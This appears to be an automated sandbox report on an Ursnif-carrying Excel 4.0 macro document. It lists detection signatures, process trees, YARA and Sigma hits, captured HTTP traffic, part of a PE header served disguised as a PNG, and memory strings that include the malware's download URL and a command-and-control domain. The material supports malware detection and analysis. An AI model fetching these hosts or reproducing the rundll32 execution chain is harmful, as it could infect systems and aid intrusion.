
Analysis Report http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls

Overview

General Information

Sample URL: http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls
Analysis ID: 330745

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Injects files into Windows application
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • cmd.exe (PID: 6088 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls' > cmdline.out 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wget.exe (PID: 5876 cmdline: wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls' MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • EXCEL.EXE (PID: 6840 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6524 cmdline: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 5868 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1584 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5868 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5412 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5512 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5412 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6688 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1500 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls, Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4e0f7:$s1: Excel
  • 0x505bd:$s1: Excel
  • 0x50b62:$s1: Excel
  • 0x50ec9:$s1: Excel
  • 0x50f2f:$s1: Excel
  • 0x50f48:$s1: Excel
  • 0x3ad7:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: C:\Users\user\Desktop\download\ref-151220-BTC2XU590R2HT8.xls, Rule: JoeSecurity_HiddenMacro, Description: Yara detected hidden Macro 4.0 in Excel, Author: Joe Security

Memory Dumps

Source: 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000004.00000003.747278419.0000000005F50000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000004.00000003.748655251.0000000005F50000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000004.00000003.747986077.0000000005F50000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000004.00000003.748565990.0000000005F50000.00000004.00000040.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Data: Command: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer, CommandLine: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6840, ProcessCommandLine: rundll32 C:\rsfsv\drgd.dbvf,DllRegisterServer, ProcessId: 6524

Signature Overview


Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\rundll32.exe
Source: excel.exe, Memory has grown: Private usage: 1MB later: 115MB

Networking:

Downloads files with wrong headers with respect to MIME Content-Type
              Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 15 Dec 2020 14:43:00 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Tue, 15 Dec 2020 09:56:58 GMT ETag: "7d000-5b67dc7836e80" Accept-Ranges: bytes Content-Length: 512000 Connection: close Content-Type: image/png Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 dd 59 c9 42 bc 37 9a 42 bc 37 9a 42 bc 37 9a 65 7a 4a 9a 57 bc 37 9a 65 7a 59 9a 74 bc 37 9a 65 7a 5a 9a ca bc 37 9a 4b c4 a4 9a 45 bc 37 9a 42 bc 36 9a 29 bc 37 9a 65 7a 45 9a 43 bc 37 9a 65 7a 4d 9a 43 bc 37 9a 65 7a 4b 9a 43 bc 37 9a 65 7a 4f 9a 43 bc 37 9a 52 69 63 68 42 bc 37 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6a 71 82 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 07 00 00 e0 00 00 00 00 00 00 8e 13 01 00 00 10 00 00 00 70 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 08 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 69 07 00 82 00 00 00 a4 60 07 00 50 00 00 00 00 10 08 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 f4 19 00 00 00 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e2 59 07 00 00 10 00 00 00 60 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 9d 00 00 00 70 07 00 00 20 00 00 00 70 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 c0 2e 72 73 72 63 00 00 00 00 05 00 00 00 10 08 00 00 10 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 29 00 00 00 20 08 00 00 30 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 15 Dec 2020 14:43:00 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Tue, 15 Dec 2020 09:56:58 GMTETag: "7d000-5b67dc7836e80"Accept-Ranges: bytesContent-Length: 512000Connection: closeContent-Type: image/pngData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 dd 59 c9 42 bc 37 9a 42 bc 37 9a 42 bc 37 9a 65 7a 4a 9a 57 bc 37 9a 65 7a 59 9a 74 bc 37 9a 65 7a 5a 9a ca bc 37 9a 4b c4 a4 9a 45 bc 37 9a 42 bc 36 9a 29 bc 37 9a 65 7a 45 9a 43 bc 37 9a 65 7a 4d 9a 43 bc 37 9a 65 7a 4b 9a 43 bc 37 9a 65 7a 4f 9a 43 bc 37 9a 52 69 63 68 42 bc 37 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6a 71 82 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 07 00 00 e0 00 00 00 00 00 00 8e 13 01 00 00 10 00 00 00 70 07 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 08 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 69 07 00 82 00 00 00 a4 60 07 00 50 00 00 00 00 10 08 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 f4 19 00 00 00 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e2 59 07 00 00 10 00 00 00 60 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 9d 00 00 00 70 07 00 00 20 00 00 00 70 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 
00 c0 2e 72 73 72 63 00 00 00 00 05 00 00 00 10 08 00 00 10 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 29 00 00 00 20 08 00 00 30 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected:
  GET /ref-151220-BTC2XU590R2HT8.xls HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
  Accept: */*
  Accept-Encoding: identity
  Host: snenpinfrresertts.com
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /str.png HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: snenpinfrresertts.com
  Connection: Keep-Alive
Source: msapplication.xml0.17.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc3a9ffe4,0x01d6d2f0</date><accdate>0xc3a9ffe4,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.17.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc3a9ffe4,0x01d6d2f0</date><accdate>0xc3a9ffe4,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.17.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc3aec46c,0x01d6d2f0</date><accdate>0xc3aec46c,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.17.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc3aec46c,0x01d6d2f0</date><accdate>0xc3aec46c,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.17.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc3aec46c,0x01d6d2f0</date><accdate>0xc3aec46c,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.17.dr, String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc3aec46c,0x01d6d2f0</date><accdate>0xc3aec46c,0x01d6d2f0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown, DNS traffic detected: queries for: snenpinfrresertts.com
Source: rundll32.exe, 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmp, String found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmp, String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmp, String found in binary or memory: http://cps.letsencrypt.org0
Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmp, String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmp, String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.dr, String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmp, String found in binary or memory: http://r3.i.lencr.org/0
Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmp, String found in binary or memory: http://r3.o.lencr.org0
Source: wget.exe, 00000002.00000002.653836313.00000000001C5000.00000004.00000040.sdmp, cmdline.out.2.dr, String found in binary or memory: http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls
Source: wget.exe, 00000002.00000002.653836313.00000000001C5000.00000004.00000040.sdmp, String found in binary or memory: http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xls-
Source: wget.exe, 00000002.00000002.653836313.00000000001C5000.00000004.00000040.sdmp, String found in binary or memory: http://snenpinfrresertts.com/ref-151220-BTC2XU590R2HT8.xlspose
Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.dr, String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: msapplication.xml.17.dr, String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.17.dr, String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.17.dr, String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.17.dr, String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.17.dr, String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.17.dr, String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.17.dr, String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.17.dr, String found in binary or memory: http://www.youtube.com/
Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.dr, Strings found in binary or memory (one finding per entry):
  • https://analysis.windows.net/powerbi/api
  • https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  • https://api.aadrm.com/
  • https://api.addins.omex.office.net/appinfo/query
  • https://api.addins.omex.office.net/appstate/query
  • https://api.diagnostics.office.com
  • https://api.diagnosticssdf.office.com
  • https://api.microsoftstream.com/api/
  • https://api.office.net
  • https://api.onedrive.com
  • https://api.powerbi.com/beta/myorg/imports
  • https://api.powerbi.com/v1.0/myorg/datasets
  • https://api.powerbi.com/v1.0/myorg/groups
  • https://apis.live.net/v5.0/
  • https://arc.msn.com/v4/api/selection
  • https://asgsmsproxyapi.azurewebsites.net/
  • https://augloop.office.com
  • https://augloop.office.com/v2
  • https://autodiscover-s.outlook.com/
  • https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
  • https://cdn.entity.
  • https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
  • https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
  • https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
  • https://client-office365-tas.msedge.net/ab
  • https://clients.config.office.net/
  • https://clients.config.office.net/user/v1.0/android/policies
  • https://clients.config.office.net/user/v1.0/ios
  • https://clients.config.office.net/user/v1.0/mac
  • https://clients.config.office.net/user/v1.0/tenantassociationkey
  • https://cloudfiles.onenote.com/upload.aspx
  • https://config.edge.skype.com
  • https://config.edge.skype.com/config/v1/Office
  • https://config.edge.skype.com/config/v2/Office
  • https://contentstorage.omex.office.net/addinclassifier/officeentities
  • https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
  • https://cortana.ai
  • https://cr.office.com
  • https://dataservice.o365filtering.com
  • https://dataservice.o365filtering.com/
  • https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
  • https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
  • https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
  • https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
  • https://dev0-api.acompli.net/autodetect
  • https://devnull.onenote.com
  • https://directory.services.
  • https://ecs.office.com/config/v2/Office
  • https://entitlement.diagnostics.office.com
  • https://entitlement.diagnosticssdf.office.com
  • https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  • https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
  • https://globaldisco.crm.dynamics.com
  • https://graph.ppe.windows.net
  • https://graph.ppe.windows.net/
  • https://graph.windows.net
  • https://graph.windows.net/
  • https://hubblecontent.osi.office.net/contentsvc/api/telemetry
  • https://hubblecontent.osi.office.net/contentsvc/browse?
  • https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
  • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
  • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
  • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
  • https://hubblecontent.osi.office.net/contentsvc/microsofticon?
  • https://incidents.diagnostics.office.com
  • https://incidents.diagnosticssdf.office.com
  • https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
  • https://insertmedia.bing.office.net/odc/insertmedia
  • https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
  • https://lifecycle.office.com
  • https://login.microsoftonline.com/
  • https://login.windows-ppe.net/common/oauth2/authorize
  • https://login.windows.local
  • https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
  • https://login.windows.net/common/oauth2/authorize
  • https://loki.delve.office.com/api/v1/configuration/officewin32/
  • https://lookup.onenote.com/lookup/geolocation/v1
  • https://management.azure.com
  • https://management.azure.com/
  • https://messaging.office.com/
  • https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
  • https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  • https://ncus-000.contentsync.
  • https://ncus-000.pagecontentsync.
  • https://o365auditrealtimeingestion.manage.office.com
  • https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
  • https://o365diagnosticsppe-web.cloudapp.net
  • https://ocos-office365-s2s.msedge.net/ab
  • https://ofcrecsvcapi-int.azurewebsites.net/
  • https://officeapps.live.com
  • https://officeci.azurewebsites.net/api/
  • https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
  • https://officesetup.getmicrosoftkey.com
  • https://ogma.osi.office.net/TradukoApi/api/v1.0/
  • https://onedrive.live.com
  • https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
  • https://onedrive.live.com/embed?
  • https://outlook.office.com/
  • https://outlook.office.com/autosuggest/api/v1/init?cvid=
  • https://outlook.office365.com/
  • https://outlook.office365.com/api/v1.0/me/Activities
  • https://outlook.office365.com/autodiscover/autodiscover.json
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://powerlift.acompli.net
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://settings.outlook.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://shell.suite.office.com:1443
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://skyapi.live.net/Activity/
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://store.office.cn/addinstemplate
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://store.office.com/addinstemplate
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://store.office.de/addinstemplate
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://store.officeppe.com/addinstemplate
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://tasks.office.com
              Source: BE0FADF8-31F9-477B-BB91-AE55517E7242.3.drString found in binary or memory: https://templatelogging.office.com/client/log
              Source: rundll32.exe, 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmpString found in binary or memory: https://toldtonts.website
              Source: rundll32.exe, 00000004.00000003.928235723.0000000000DB1000.00000004.00000001.sdmpString found in binary or memory: https://toldtonts.website/
              Source: rundll32.exe, 00000004.00000003.928235723.0000000000DB1000.00000004.00000001.sdmpString found in binary or memory: https://toldtonts.website/E
              Source: rundll32.exe, 00000004.00000002.1088930017.0000000000DA6000.00000004.00000001.sdmp, ~DF6CC44F9D650874C3.TMP.17.drString found in binary or memory: https://toldtonts.website/index.htm
              Source: {ECA749BB-3EE3-11EB-90EB-ECF4BBEA1588}.dat.17.drString found in binary or memory: https://toldtonts.website/index.htmRoot
